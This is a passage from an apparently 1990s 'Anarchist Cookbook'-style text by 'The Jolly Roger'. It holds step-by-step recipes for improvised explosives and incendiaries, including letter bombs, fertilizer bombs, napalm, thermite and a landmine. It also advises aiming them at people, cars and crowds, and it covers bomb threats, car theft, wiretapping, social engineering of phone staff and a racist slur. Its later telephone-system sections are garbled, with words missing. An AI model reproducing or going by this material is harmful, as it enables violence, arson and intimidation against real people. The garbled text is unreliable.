of it as walking into an enemies house, and
using their phone to your heart's content.
9. How to make a CO² bomb by the Jolly Roger
You will have to use up the cartridge first by either shooting it or whatever.
With a nail, force a hole bigger so as to allow the powder and wick to fit in
easily. Fill the cartridge with black powder and
pack it in there real good by tapping the bottom of the cartridge on a hard
surface (I said TAP not SLAM!). Insert a fuse. I recommend a good water-proof
cannon fuse, or an m-80 type fuse,
but firecracker fuses work, if you can run like a black man runs from the cops
after raping a white girl.) Now, light it and run like hell! It does wonders for
a row of mailboxes (like the ones in apartment
complexes), a car (place under the gas tank), a picture window (place on window
sill), a phone booth (place right under the phone), or any other devious place.
This thing throws shrapnel, and can
make quit a mess!!
10. Thermite II by Jolly Roger
Thermite is nasty shit. Here is a good and easy way to make it. The first step
is to get some iron-oxide (which is RUST!). Here is a good way to make large
quantities in a short time:
· Get a DC converter like the one used on a train set. Cut the connector off,
separate the wires, and strip them both.
· Now you need a jar of water with a tablespoon or so of sodium chloride (which
is SALT!) added to it. This makes the water conductive.
· Now insert both wires into the mixture (I am assuming you plugged the
converter in...) and let them sit for five minutes. One of them will start
bubbling more than the other. This is the
POSITIVE(+) wire. If you do not do this test right, the final product will be
the opposite (chemically) of rust, which is RUST ACID. You have no use for this
here (although it IS useful!).
· Anyway, put the nail tied to the positive wire into the jar. Now put the
negative wire in the other end. Now let it sit overnight and in the morning
scrape the rust off of the nail & repeat until
you got a bunch of rust on the bottom of the glass. Be generous with your rust
collection. If you are going through the trouble of making thermite, you might
as well make a lot, right?
· Now remove the excess water and pour the crusty solution onto a cookie sheet.
Dry it in the sun for a few hours, or inside overnight. It should be an
orange-brown color (although I have
seen it in many different colors! Sometimes the color gets fucked up, what can I
say... but it is still iron oxide!)
· Crush the rust into a fine powder and heat it in a cast-iron pot until it is
red. Now mix the pure iron oxide with pure aluminum filings which can be bought
or filed down by hand from an
aluminum tube or bar. The ratio or iron oxide to aluminum is 8 grams to 3 grams.
· Congrats! You have just made THERMITE! Now, to light it...
· Thermite requires a LOT of heat (more than a blow torch!) to ignite. However,
magnesium ribbon (which is sort of hard to find.. call around) will do the
trick. It takes the heat from the
burning magnesium to light the thermite.
· Now when you see your victim's car, pour a fifty-cent sized pile onto his
hood, stick the ribbon in it, and light the ribbon with the blow torch. Now
chuckle as you watch it burn through the
hood, the block, the axle, and the pavement. BE CAREFUL! The ideal mixtures can
vaporize CARBON STEEL! Another idea is to use thermite to get into pay phone
cash boxes.
11. Touch Explosives by the Jolly Roger
This is sort of a mild explosive, but it can be quite dangerous in large
quantities. To make touch explosive (such as that found in a snap-n-pop, but
more powerful), use this recipe:
· Mix iodine crystals into ammonia until the iodine crystals will not dissolve
into the ammonia anymore. Pour off the excess ammonia and dry out the crystals
on a baking sheet the same way
as you dried the thermite (in other words, just let it sit overnight!).
· Be careful now because these crystals are now your touch explosive. Carefully
wrap a bunch in paper (I mean carefully! Friction sets 'em off!) and throw them
around.. pretty loud, huh?
They are fun to put on someone's chair. Add a small fish sinker to them and they
can be thrown a long distance (good for crowds, football games, concerts, etc.)
12. Letter Bombs by The Jolly Roger
· You will first have to make a mild version of thermite. Use my recipe, but
substitute iron fillings for rust.
· Mix the iron with aluminum fillings in a ratio of 75% aluminum to 25% iron.
This mixture will burn violently in a closed space (such as an envelope). This
bring us to our next ingredient...
· Go to the post office and buy an insulated (padded) envelope. You know, the
type that is double layered. Separate the layers and place the mild thermite in
the main section, where the letter
would go. Then place magnesium powder in the outer layer. There is your bomb!!
· Now to light it... this is the tricky part and hard to explain. Just keep
experimenting until you get something that works. The fuse is just that touch
explosive I have told you about in another
one of my anarchy files. You might want to wrap it like a long cigarette and
then place it at the top of the envelope in the outer layer (on top of the
powdered magnesium). When the touch explosive is
torn or even squeezed hard it will ignite the powdered magnesium (sort of a
flash light) and then it will burn the mild thermite. If the thermite didn't
blow up, it would at least burn the fuck out of your
enemy (it does wonders on human flesh!).
13. Paint Bombs by The Jolly Roger
To make a pain bomb you simply need a metal pain can with a refastenable lid, a
nice bright color paint (green, pink, purple, or some gross color is perfect!),
and a quantity of dry ice. Place the paint in
the can and then drop the dry ice in. Quickly place the top on and then run like
hell! With some testing you can time this to a science. It depends on the ratio
of dry ice to paint to the size of the can to
how full it is. If you are really pissed off at someone, you could place it on
their doorstep, knock on the door, and then run!! Paint will fly all over the
place!!
14. Ways to send a car to Hell by The Jolly Roger
There are 1001 ways to destroy a car but I am going to cover only the ones that
are the most fun (for you), the most destructive (for them), and the hardest to
trace (for the cops).
· Place thermite on the hood, light it, and watch it burn all the way through
the pavement!
· Tape a CO² bomb to the hood, axle, gas tank, wheel, muffler, etc.
· Put a tampon, dirt, sugar (this one is good!), a ping pong ball, or just about
anything that will dissolve in the gas tank.
· Put potatoes, rocks, bananas, or anything that will fit, into the tailpipe.
Use a broom handle to stuff 'em up into the tailpipe.
· Put a long rag into the gas tank and light it...
· Steal a key, copy it, replace it, and then steal the stereo.
· Break into the car. Cut a thin metal ruler into a shape like this:
Slide it into the outside window and keep pulling it back up until you catch the
lock cable which should unlock the door. This device is also called a SLIM JIM.
Now get the stereo, equalizer, radar
detector, etc. Now destroy the inside. (A sharp knife does wonders on the
seats!)
15. Do you hate school? by The Jolly Roger
· One of my favorites for getting out of a class or two is to call in a bomb
threat. Tell 'em that it is in a locker. Then they have to check them all,
whilst you can slip away for an hour or two.
You can even place a fake bomb (in any locker but YOURS!). They might cancel
school for a week while they investigate (of course, you will probably have to
make it up in the summer).
· Get some pure potassium or pure sodium, put it in a capsule, and flush it down
the toilet (smells awful! Stinks up the whole school!).
· Use a smoke grenade in the hallway.
· Steal the computer passwords & keys. Or steal the 80 column cards inside if
they are (gag) IBM.
· Make friends with student assistants and have them change your grades when the
teachers hand in their bubble sheets for the report cards.
· Spit your gum out on the carpet in the library or whatever and grind it into
the carpet. Watch the janitors cry!
· Draw on lockers or spraypaint on the building that the principal is a fascist.
· Stick a potato in the tailpipe of the principal's car.
· USE YOUR IMAGINATION!
16. Phone related vandalism by the Jolly Roger
If you live where there are underground lines then you will be able to ruin
someone's phone life very easily. All you must do is go to their house and find
the green junction box that interfaces their line
(and possibly some others in the neighborhood) with the major lines. These can
be found just about anywhere but they are usually underneath the nearest phone
pole. Take a socket wrench and loosen
the nut on the right. Then just take clippers or a sledge hammer or a bomb and
destroy the insides and pull up their phone cable. Now cut it into segments so
it can't be fixed but must be replaced
(There is a week's worth of work for 'em!!)
17. Highway radar jamming by The Jolly Roger
Most drivers wanting to make better time on the open road will invest in one of
those expensive radar detectors. However, this device will not work against a
gun type radar unit in which the radar
signal is not present until the cop has your car in his sights and pulls the
trigger. Then it is TOO LATE for you to slow down. A better method is to
continuously jam any signal with a radar signal of your
own. I have tested this idea with the cooperation of a local cop and found that
his unit reads random numbers when my car approached him. It is suprisingly easy
to make a low power radar transmitter.
A nifty little semiconductor called a Gunn Diode will generate microwaves when
supplied with the 5 to 10 volt DC and enclosed in the correct size cavity
(resonator). An 8 to 3 terminal regulator can be
used to get this voltage from a car's 12v system. However, the correct
construction and tuning of the cavity is difficult without good microwave
measurement equipment. Police radars commonly
operate on the K band at 22 GHz. Or more often on the X band at 10½25 GHz. most
microwave intruder alarms and motion detectors (mounted over automatic doors in
supermarkets & banks, etc.)
contain a Gunn type transmitter/receiver combination that transmits about 10
kilowatts at 10½25 GHz. These units work perfectly as jammers. If you cannot get
one locally, write to Microwave
Associates in Burlington, Massachusetts and ask them for info on 'Gunnplexers'
for ham radio use. When you get the unit it may be mounted in a plastic box on
the dash or in a weather-proof enclosure
behind the PLASTIC grille. Switch on the power when on an open highway. The unit
will not jam radar to the side or behind the car so don't go speeding past the
radar trap. An interesting phenomena
you will notice is that the drivers who are in front of you who are using
detectors will hit their brakes as you approach large metal signs and bridges.
Your signal is bouncing off of these objects and
triggering their radar detectors!
PS If you are interested in this sort of thing, get a copy of POPULAR
COMMUNICATIONS. The ads in there tell you where you can get all kinds of info on
all kinds of neat equipment for all kinds of
neat things!
18. Smoke Bombs by the Jolly Roger
Here is the recipe for one hell of a smoke bomb!
4 parts sugar
6 parts potassium nitrate (Salt Peter)
Heat this mixture over a LOW flame until it melts, stirring well. Pour it into a
future container and, before it solidifies, imbed a few matches into the mixture
to use as fuses. One pound of this stuff will fill
up a whole block with thick, white smoke!
19. Mail Box Bombs by the Jolly Roger
1. Two liter bottle of chlorine (must contain sodium hypochlorate)
2. Small amount of sugar
3. Small amount of water
Mix all three of these in equal amounts to fill about 1/10 of the bottle. Screw
on the lid and place in a mailbox. It's hard to believe that such a small
explosion will literally rip the mailbox in half and send
it 20 feet into the air! Be careful doing this, though, because if you are
caught, it is not up to the person whose mailbox you blew up to press charges.
It is up to the city.
20. The easiest way to hot-wire cars by the Jolly Roger
Get in the car. Look under the dash. If it's enclosed, forget it unless you want
to cut through it. If you do, do it near the ignition. Once you get behind or
near the ignition look for two red wires. In older
cars red was the standard color, if not, look for two matched pairs. When you
find them, cross them and take off!
21. How to make Napalm by the Jolly Roger
· Pour some gas into an old bowl, or some kind of container.
· Get some styrofoam and put it in the gas, until the gas won't eat anymore. You
should have a sticky syrup.
· Put it on the end of something (don't touch it!!). The unused stuff lasts a
long time!
22. How to make a fertilizer bomb by The Jolly Roger
Ingredients:
· Newspaper
· Fertilizer (the chemical kind, GREEN THUMB or ORCHO)
· Cotton
· Diesel fuel
Make a pouch out of the newspaper and put some fertilizer in it. Then put cotton
on top. Soak the cotton with fuel. Then light and run like you have never ran
before! This blows up 500 square feet so
don't do it in an alley!!
23. Tennis Ball Bombs by The Jolly Roger
Ingredients:
· Strike anywhere matches
· A tennis ball
· A nice sharp knife
· Duct tape
Break a ton of matchheads off. Then cut a SMALL hole in the tennis ball. Stuff
all of the matchheads into the ball, until you can't fit any more in. Then tape
over it with duct tape. Make sure it is real
nice and tight! Then, when you see a geek walking down the street, give it a
good throw. He will have a blast!!
24. Diskette Bombs by The Jolly Roger
You need:
· A disk
· Scissors
· White or blue kitchen matches (they MUST be these colors!)
· Clear nail polish
1. Carefully open up the diskette (3½" disks are best for this!)
2. Remove the cotton covering from the inside.
3. Scrape a lot of match powder into a bowl (use a wooden scraper, metal might
spark the matchpowder!)
4. After you have a lot, spread it evenly on the disk.
5. Using the nail polish, spread it over the match mixture
6. Let it dry
7. Carefully put the diskette back together and use the nail polish to seal it
shut on the inside (where it came apart).
When that disk is in a drive, the drive head attempts to read the disk, which
causes a small fire (ENOUGH HEAT TO MELT THE DISK DRIVE AND FUCK THE HEAD UP!!).
Let the fuckhead
try and fix THAT!!!
25. Unlisted Phone Numbers by The Jolly Roger
There are a couple of different ways of doing this. Let's see if this one will
help: Every city has one or more offices dedicated to assigning numbers to the
telephone wire pairs. These offices are called
DPAC offices and are available to service reps who are installing or repairing
phones. To get the DPAC number, a service rep would call the customer service
number for billing information in the town
that the number is located in that he is trying to get the unlisted number of.
(Got that?) The conversation would go something like this: "Hi, Amarillo, this
is Joe from Anytown business office, I need the
DPAC number for the south side of town." This info is usually passed out with no
problems, so... if the first person you call doesn't have it, try another.
REMEMBER, no one has ANY IDEA who the
hell you are when you are talking on the phone, so you can be anyone you damn
well please! When you call the DPAC number, just tell them that you need a
listing for either the address that you have,
or the name. DPAC DOES NOT SHOW WHETHER THE NUMBER IS LISTED OR UNLISTED!! Also,
if you're going to make a habit of chasing numbers down, you might want to check
into
getting a criss-cross directory, which lists phone numbers by their addresses.
It costs a couple hundred bucks, but it is well worth it if you have to chase
more than one or two numbers down!
26. Fuses by The Jolly Roger
You would be surprised how many files are out there that use what falls under
the category of a "fuse." They assume that you just have a few lying around, or
know where to get them. Well, in some
parts of the country, fuses are extremely hard to come by... so this file tells
you how to make your own. Both fuses presented here are fairly simple to make,
and are fairly reliable.
SLOW BURNING FUSE - 2 inches per minute
Materials needed:
· Cotton string or 3 shoelaces
· Potassium Nitrate or Potassium Chlorate
· Granulated sugar
Procedure:
1. Wash the cotton string or shoelaces in HOT soapy water, then rinse with fresh
water
2. Mix the following together in a glass bowl:
· 1 part potassium nitrate or potassium chlorate
· 1 part granulated sugar
· 2 parts hot water
3. Soak strings or shoelaces in this solution
4. Twist/braid 3 strands together and allow them to dry
5. Check the burn rate to see how long it actually takes!!
FAST BURNING FUSE - 40 inches per minute
Materials needed:
· Soft cotton string
· Fine black powder (empty a few shotgun shells!)
· Shallow dish or pan
Procedure:
1. Moisten powder to form a paste.
2. Twist/braid 3 strands of cotton together.
3. Rub paste into string and allow to dry.
4. Check the burn rate!!!
27. How to make Potassium Nitrate by The Jolly Roger
Potassium Nitrate is an ingredient in making fuses, among other things. Here is
how you make it:
Materials needed:
· 3½ gallons of nitrate bearing earth or other material
· ½ cup of wood ashes
· Bucket or other similar container about 4-5 gallons in volume
· 2 pieces of finely woven cloth, each a bit bigger than the bottom of the
bucket
· Shallow dish or pan at least as large in diameter as the bucket
· Shallow, heat resistant container
· 2 gallons of water
· Something to punch holes in the bottom of the bucket
· 1 gallon of any type of alcohol
· A heat source
· Paper & tape
Procedure:
1. Punch holes on the inside bottom of the bucket, so that the metal is
"puckered" outward from the bottom.
2. Spread cloth over the holes from the bottom.
3. Place wood ashes on the cloth. Spread it out so that it covers the entire
cloth and has about the same thickness.
4. Place 2nd cloth on top of the wood ashes.
5. Place the dirt or other material in the bucket.
6. Place the bucket over the shallow container. NOTE: It may need support on the
bottom so that the holes on the bottom are not blocked.
7. Boil water and pour it over the earth very slowly. Do NOT pour it all at
once, as this will clog the filter on the bottom.
8. Allow water to run through holes into the shallow dish on the bottom.
9. Be sure that the water goes through ALL of the earth!
10. Allow water in dish to cool for an hour or so.
11. Carefully drain the liquid in the dish away, and discard the sludge in the
bottom.
12. Boil this liquid over a fire for at least two hours. Small grains of salt
will form - scoop these out with the paper as they form.
13. When the liquid has boiled down to ½ its original volume let it sit.
14. After ½ hour, add equal volume of the alcohol; when this mixture is poured
through paper, small white crystals appear. This is the potassium nitrate.
Purification:
1. Redissolve crystals in small amount of boiling water.
2. Remove any crystals that appear.
3. Pour through improvised filter then heat concentrated solution to dryness.
4. Spread out crystals and allow to dry.
28. Exploding Lightbulbs by The Jolly Roger
Materials needed:
· Lightbulb (100w)
· Socket (duh...)
· ¼ cup soap chips
· Blackpowder! (open some shotgun shells!)
· ¼ cup kerosene or gasoline
· Adhesive tape
· Lighter or small blowtorch
· Glue
Procedure for a simple exploding lightbulb:
1. Drill a small hole in the top of the bulb near the threads!
2. Carefully pour the blackpowder into the hole. Use enough so that it touches
the filament!
3. Insert into socket as normal (make sure the light is off or else YOU will be
the victim!!)
4. Get the hell out!!
Procedure for a Napalm Bulb:
1. Heat kerosene/gasoline in a double boiler.
2. Melt soap chips, stirring slowly.
3. Put somewhere and allow to cool.
4. Heat the threads of the bulb VERY carefully to melt the glue. Remove threads,
slowly drawing out the filament. Do NOT break the cheap electrical igniters
and/or the filament or this won't
work!!
5. Pour the liquid into the bulb, and slowly lower the filament back down into
the bulb. Make sure the filament is dipped into the fluid.
6. Re-glue the threads back on. Insert it into a socket frequently used by the
victim and get the hell out!!
When the victim flips the switch, he will be in for a BIG surprise!
29. Under water igniters by The Jolly Roger
Materials needed:
· Pack of 10 silicon diodes. (Available at Radio Shack. You will know you got
the right ones if they are very, very small glass objects!)
· Pack of matches
· 1 candle
Procedure:
1. Light the candle and allow a pool of molten wax to form in the top.
2. Take a single match and hold the glass part of a single diode against the
head. Bend the diode pins around the matchhead so that one wraps in an upward
direction and then sticks out to the
side. Do the same with the other wire, but in a downward direction. The diodes
should now be hugging the matchhead, but its wires MUST NOT TOUCH EACH OTHER!
3. Dip the matchhead in wax to give it a water-proof coat. These work underwater
4. Repeat to make as many as you want.
How to use them:
When these little dudes are hooked across a 6v battery, the diode reaches what
is called breakdown voltage. When most electrical components reach this voltage,
they usually produce great amounts
of heat and light, while quickly melting into a little blob. This heat is enough
to ignite a matchhead. These are recommended for use underwater, where most
other igniters refuse to work.
30. Home-brew blast cannon by The Jolly Roger
Materials needed:
· 1 plastic drain pipe, 3 feet long, at least 3 ½ inches in diameter.
· 1 smaller plastic pipe, about 6 inches long, 2 inches in diameter.
· 1 large lighter, with fluid refills (this gobbles it up!)
· 1 pipe cap to fit the large pipe, 1 pipe cap to fit the small pipe.
· 5 feet of bellwire.
· 1 SPST rocker switch.
· 16v polaroid pot-a-pulse battery.
· 15v relay (get this at Radio Shack).
· Electrical Tape.
· One free afternoon.
Procedure:
· Cut the bell wire into three equal pieces, and strip the ends.
· Cut a hole in the side of the large pipe, the same diameter as the small pipe.
Thread the hole and one end of the small pipe. They should screw together
easily.
· Take a piece of scrap metal, and bend it into an "L" shape, then attach it to
the level on the lighter:
/------------------------gas switch is here
V
/------
!lighter!!<---metal lever!!
· Now, every time you pull the 'trigger' gas should flow freely from the
lighter. You may need to enlarge the 'gas port' on your lighter, if you wish to
be able to fire more rapidly.
· Connect two wires to the two posts on the switch.
· Cut two holes in the side of the smaller tube, one for the switch on the
bottom, and one for the metal piece on the top. Then, mount the switch in the
bottom, running the wires up and out of
the top.
· Mount the lighter/trigger in the top. Now the switch should rock easily, and
the trigger should cause the lighter to pour out gas. Re-screw the smaller tube
into the larger one, hold down the
trigger a bit, let it go, and throw a match in there. If all goes well, you
should hear a nice big 'THUD!'
· Get a hold of the relay, and take off the top.
1---------------
v/
2--------------/<--the center object is the metal finger inside the relay
3
cc-------------/
oo----------------4
ii
ll----------------5
· Connect (1) to one of the wires coming from the switch. Connect (2) to (4),
and connect (5) to one side of the battery. Connect the remaining wire from the
switch to the other side of the
battery. Now you should be able to get the relay to make a little 'buzzing'
sound when you flip the switch and you should see some tiny little sparks.
· Now, carefully mount the relay on the inside of the large pipe, towards the
back. Screw on the smaller pipe, tape the battery to the side of the cannon
barrel (yes, but looks aren't
everything!)
· You should now be able to let a little gas into the barrel and set it off by
flipping the switch.
· Put the cap on the back end of the large pipe VERY SECURELY. You are now ready
for the first trial-run!
To Test:
Put something very, very large into the barrel, just so that it fits 'just
right'. Now, find a strong guy (the recoil will probably knock you on your ass
if you aren't careful!). Put on a shoulderpad, earmuffs,
and possibly some other protective clothing (trust the Jolly Roger! You are
going to need it!). Hold the
trigger down for 30 seconds, hold on tight, and hit the switch. With luck and
the proper adjustments, you should be able to put a frozen orange through ¼ or
plywood at 25 feet.
31. Chemical Equivalency list by The Jolly Roger
Acacia................................................................Gum Arabic
Acetic Acid..............................................................Vinegar
Aluminum Oxide............................................................Alumia
Aluminum Potassium Sulphate.................................................Alum
Aluminum Sulfate............................................................Alum
Ammonium Carbonate.....................................................Hartshorn
Ammonium Hydroxide.......................................................Ammonia
Ammonium Nitrate......................................................Salt Peter
Ammonium Oleate.....................................................Ammonia Soap
Amylacetate...........................................................Banana Oil
Barium Sulfide.........................................................Black Ash
Carbon Carbinate...........................................................Chalk
Carbontetrachloride...............................................Cleaning Fluid
Calcium Hypochloride............................................Bleaching Powder
Calcium Oxide...............................................................Lime
Calcium Sulfate.................................................Plaster of Paris
Carbonic Acid............................................................Seltzer
Cetyltrimethylammoniumbromide......................................Ammonium Salt
Ethylinedichloride...................................................Dutch Fluid
Ferric Oxide...........................................................Iron Rust
Furfuraldehyde..........................................................Bran Oil
Glucose...............................................................Corn Syrup
Graphite.............................................................Pencil Lead
Hydrochloric Acid..................................................Muriatic Acid
Hydrogen Peroxide.......................................................Peroxide
Lead Acetate.......................................................Sugar of Lead
Lead Tero-oxide.........................................................Red Lead
Magnesium Silicate..........................................................Talc
Magnesium Sulfate.....................................................Epsom Salt
Methylsalicylate................................................Winter Green Oil
Naphthalene............................................................Mothballs
Phenol.............................................................Carbolic Acid
Potassium Bicarbonate............................................Cream of Tarter
Potassium Chromium Sulfate............................................Chromealum
Potassium Nitrate.....................................................Salt Peter
Sodium Oxide................................................................Sand
Sodium Bicarbonate...................................................Baking Soda
Sodium Borate..............................................................Borax
Sodium Carbonate....................................................Washing Soda
Sodium Chloride.............................................................Salt
Sodium Hydroxide.............................................................Lye
Sodium Silicate............................................................Glass
Sodium Sulfate....................................................Glauber's Salt
Sodium Thiosulfate...........................................Photographer's Hypo
Sulfuric Acid.......................................................Battery Acid
Sucrose...............................................................Cane Sugar
Zinc Chloride.....................................................Tinner's Fluid
Zinc Sulfate.......................................................White Vitriol
32. Phone Taps by The Jolly Roger
Here is some info on phone taps. In this file is a schematic for a simple
wiretap & instructions for hooking up a small tape recorder control relay to the
phone line.
First, I will discuss taps a little. There are many different types of taps.
There are transmitters, wired taps, and induction taps to name a few. Wired and
wireless transmitters must be physically
connected to the line before they will do any good. Once a wireless tap is
connected to the line, it can transmit all conversations over a limited
reception range. The phones in the house can even be
modifies to pick up conversations in the room and transmit them too! These taps
are usually powered off of the phone line, but can have an external power
source. You can get more information on
these taps by getting an issue of Popular Communications and reading through the
ads. Wired taps, on the other hand, need no power source, but a wire must be run
from the line to the listener or to a
transmitter. There are obvious advantages of wireless taps over wired ones.
There is one type of wireless tap that looks like a normal telephone mike. All
you have to do is replace the original mike with
this and it will transmit all conversations! There is also an exotic type of
wired tap known as the 'Infinity Transmitter' or 'Harmonica Bug'. In order to
hook one of these, it must be installed inside the
phone. When someone calls the tapped phone & *before* it rings and blows a
whistle over the line, the transmitter picks up the phone via a relay. The mike
on the phone is activated so that the caller
can hear all of the conversations in the room. There is a sweep tone test at
415/BUG-1111 which can be used to detect one of these taps. If one of these is
on your line & the test # sends the correct
tone, you will hear a click. Induction taps have one big advantage over taps
that must be physically wired to the phone. They do not have to be touching the
phone in order to pick up the conversation.
They work on the same principle as the little suction-cup tape recorder mikes
that you can get at Radio Shack. Induction mikes can be hooked up to a
transmitter or be wired.
Here is an example of industrial espionage using the phone:
A salesman walks into an office & makes a phone call. He fakes the conversation,
but when he hangs up he slips some foam rubber cubes into the cradle. The called
party can still hear all conversations
in the room. When someone picks up the phone, the cubes fall away unnoticed.
A tap can also be used on a phone to overhear what your modem is doing when you
are war-dialing, hacking, or just plain calling a bbs.
Here is the schematic:
-------)!----)!(------------->
)!(
Cap ^ )!(
)!(
)!(
)!(
^^^^^---)!(------------->
^ 100K
!
! <Input
The 100K pot is used for volume. It should be on its highest (least resistance)
setting if you hook a speaker across output. but set resistance tape recorder or
amplifier. may find necessary to add
another 10 - 40K. capacitor around .47 MFD.'s only purpose prevent relay in
phone from tripping & thinking that have off of hook. audio output transformer
available at Radio Shack. (part #
273-138E input). red white wires go device. want experiment with best Hooking up
easy. Just one (usually red) end other loop around. This bypasses it. look like
this:
------^^^^^^^^^------------
---------
RELAY^^ #275-004 Shack works fine) think line tapped, first thing do physically
inspect yourself ESPECIALLY phones. can get mike replacements bug detectors
built in. However, I would not
trust them too much. easy wrong reading. more info:
BUGS AND ELECTRONIC SURVEILLANCE Desert Publications HOW AVOID EAVESDROPPING
PRIVACY INVASION. remember who from... might try Paladin Press.
33. make landmine by Jolly Roger
First, need push-button switch. Take connect nine volt battery connector solar
igniter (used launching model rockets). very thin piece stereo wire will usually
trick are desperate, recommend igniter.
nine-volt switch lead
switch-----------battery
\
|
explosive
Now (pipe bomb, m-80, CO² etc.) attaching fuse (seal scotch tape). dig hole;
deep enough cover all materials. about what direction your enemy coming plant
switch, leave button visible (not visible!).
3-5 feet away because there delay explosion depends short wick is, and, homemade
being used, burning speed. right... close enough.........
BBBBBBBOOOOOOOOOOOOOOOOOOOOOOOOMMMM!
34. different kind Molitov Cocktail
Here it:
1. coke bottle fill gasoline half full.
2. Cram cloth into neck nice tight.
3. chlorine tablet stuff there. going force tablets bigger than opening bottle.
4. suitable victim wing their direction. When hits pavement any surface hard
break it, mix..... BOOM!!!!!!
35. Systems Tutorial start off, we discuss dialing procedures domestic as well
international dialing. also telephone numbering plan.
North American Plan America, follows:
· 3 digit Area (NPA) code , i.e., 7 number consisting Central Office (CO) plus 4
station
These digits called network address destination code. format of: -----------
N*X NXX-XXXX
Where: N = a 2 9
* = the 0 1
X = a Codes
Check book separate listing found many bbs's. special (SAC's):
510 TWX (USA)
610 (Canada)
700 New Service
710
800 WATS
810
900 DIAL-IT Services
910 never cross state lines, therefore each must least exclusive NPA community
split line, CO numbers often interchangeable (i.e., dial same two codes). (Telex
II) consists 5 teletype-writer codes.
They owned Western Union. SAC reached via machines. run 110 baud (last checked!
most likely faster now!). Besides numbers, machines routed normal numbers.
always respond an answerback.
example, WU FYI (910) 279-5956. answerback MAWA don't machine, still send
messages using Easylink [800/325-4112]. However gonna hack way onto one!
700: currently AT&T call forwarding service. targeted towards salesmen run.
understand works,'ll explain example. Let say Joe Q. Salespig security he
chasing phreak country royally screwed
important COSMOS system. (700) 382-5968. Every time goes hotel (or SLEAZY
MOTEL), dials #, enters code, where staying. Now, his boss received some info,
382-5968 ring wherever last
programmed to. Neat, huh?
800: my favorites since allows toll free calls. INWARD (INWATS), Wide
Telecommunications familiar with. areas bands. 6 these. Band largest anywhere US
except terminated (that why companies
then state.) includes 48 contiguous states. down which states one. Therefore,
less people reach INWATS number.
Intrastate state) exchange 800-NX2-XXXX). NXX represent business located.
beginning 800-431 terminate NY CO. hunt series means tries allocated company
lines; busy, next number, etc.
minimum lines Travelnet uses series. (800) 521-8400, associated 8400; busy port,
customers billed hours calls made
OUTWATS (OUTWARD WATS): making outgoing only. Large use receive bulk-rate
discounts. cannot incoming calls, *XXX-XXXX even designated letter) dialed
unless box call. *XX identifies
type
Remember: + EXTENDER
900: nationwide taking television polls stuff. minute costs outrageous 50-85
cents additional 35-85 cents. lot revenue way! (900) 555-1212 out identify
switching routed. following reserved nationwide:
555 directory assistance
844 time. in!
936 weather 976
950 future
958 test
959
970 (temporary)
Also, ANI ringback regarded thus reserved. vary area. (unless blue box!). due
fact exchanges (000-199) contains sorts interesting shit such conference's,
operators,
950: exchange:
1000 SPC
1022 MCI Execunet
1033
1044 Allnet
1066 Lexitel
1088 SBS Skyline SCC (Specialized Common Carriers) fortress phones! probably
phased introduction Equal Access. Tests: include ANI, Ringback, various tests.
976: 976-1000 see listings
N11 codes:
----------
Bell trying phase these, exist areas.
011 prefix
211 coin refund operator
411
611 repair
811
911 EMERGENCY Dialing, world has been divided zones. call, dial: National
station-to-station directly Direct Distance (IDDD). varies digits, zone digit.
United Kingdom 44, boards contain
complete codes, give few: America (US, Canada,
20 Egypt
258 Mozambique
34 Spain
49 Germany
52 Mexico (southern portion) USSR
81 Japan
98 Iran (call hassle those bastards!) generally same. wanted House Switzerland
tell president numbered bank account overdrawn (it happens, know!). 00 (the
SWISS prefix), code), followed
202-456-1414 House. ask Georgy him bad news!) 87 Maritime mobile service,
calling ships:
871 Marisat (Atlantic) (Pacific)
872 (Indian) Switching:
------------------------ no. ESS perform duty ISC (Inter-nation Centers).
through "gateway cities are:
182 Plains,
183 York,
184 Pittsburgh, PA
185 Orlando, Fl
186 Oakland, CA
187 Denver,
188 18X routing overseas access (to further discussed boxes). signaling CCITT.
standard signaling.
OK.. now! read this, part file #36 cookbook!
36. II deal types hierarchy, equipment.
Operators ones discussed.
TSPS Operator: [(Traffic Position System) opposed Shitty Service] bitch bastard,
female liberationists there) having/her responsibilities: Obtaining billing
information card third
Identifying customer person-to-person acceptance charges collect happens
automatically recorded CAMA(Centralized Automatic Message Accounting) forwarded
local office. could caused
equipment failures (ANIF- Identification Failure) equipped CAMA (ONI-
Identification). once had failure happen me came said, FROM? curiosity, gave CO,
she thanked was connected conversation
appeared between frame man wife. started ringing party originally everyone
phreaked (excuse pun). immediately dropped dual conference! mess KNOWS from.
show 10-digit LED read-out (ANI
board). whether trace quite readily! DANGEROUS. assists ("0") operating
connecting question long within box. box, KP+NPA+121+ST help (Blue Boxing file).
NPA-555-1212. does readily know
unlisted exists certain listing. deaf teletypewriters. modem transfer BAUDOT
[(45½ baud). Apple Cat acoustic Atari 830 modem. Yea find... this.. around!)
conversation. is: 800-855-1155. Telex
abbreviations GA ahead. tend nicer talk longer regular operators. vulnerable
talked process "social engineering Chesire Catalyst put
Unfortunately, bullshitted while back DA offices handle TTY. Philadelphia
California. approx. each. TTY job
boring (based official "BIOC poll feel under-paid. actually request (sorry, no
fancy computers!) own KP+NPA+131+ST (MF).
CN operators: exactly opposite for. experience, op susceptible engineering.
possible bullshit NON-PUB name article cookbook info them.). assume fellow
employee. breakup resulted break-up few
policy changes/A.
INTERCEPT recordings disconnected changed. says, calling? foreign accent. lowest
lifeform. though from, waste verbally abuse little English anyway.
Incidentally, intelligent the: Mobile, Ship-to-Shore, Conference, Marine Verify,
Word", Rout Rate (KP+800+141+1212+ST), network.
Problems speak supervisor... better yet Group Chief (who ranking office)
equivalent Madame whorehouse. way, allow 4th digit, fun Tel. without rare,
though! 212-121-1111 Operator. Hierarchy
system), assigned class. five classes 5. class long-distance (Toll) switched 4,
3, 2, 4X intermediate point. digital unattended attached (known Remote Unit
(RSU)). chart list name, knowledge) America:
Abb Existing Regional Center RC 12 Sectional SC 67 Primary PC 230 TC 1,300
4P Point TP IP EO 19,000 RSU another, shortest route caller party. inter-office
trunks parties, move upward servicing (Class 4). sending office, sent (3).
high-usage
interoffice trunk groups, final; groups level. connected, re-order [120 IPM
(interruptions per minute) signal] signal. time, guys Operations shitting pants
dreaded Dreadlock (as seen TV!). note
connections tandem ring-around-the-rosy occurred history. cause endless
connection [a neat really screw network]. centers Canada interconnected. form
foundation entire them, listed below: Location
Dallas 214
Wayne, 215
Denver 4T 303
Regina 2SP1-4W 306
St. Louis 314
Rockdale, 404
Pittsburgh 4E 412
Montreal 4AETS 504
37. Basic Alliance Teleconferencing
Introduction: phile accessing, understanding Systems. sections printed out.
Alliance: independent general public conferencing rumors floating subsidiary
AT&T. Well, wrong. stated above, entirely company. sophisticated users once.
Number: exchange, localized, way. states,
residents direct. later chapter.
0-700-456-1000 (Chicago)
-1001 (Los Angeles)
-1002
-1003 (Houston)
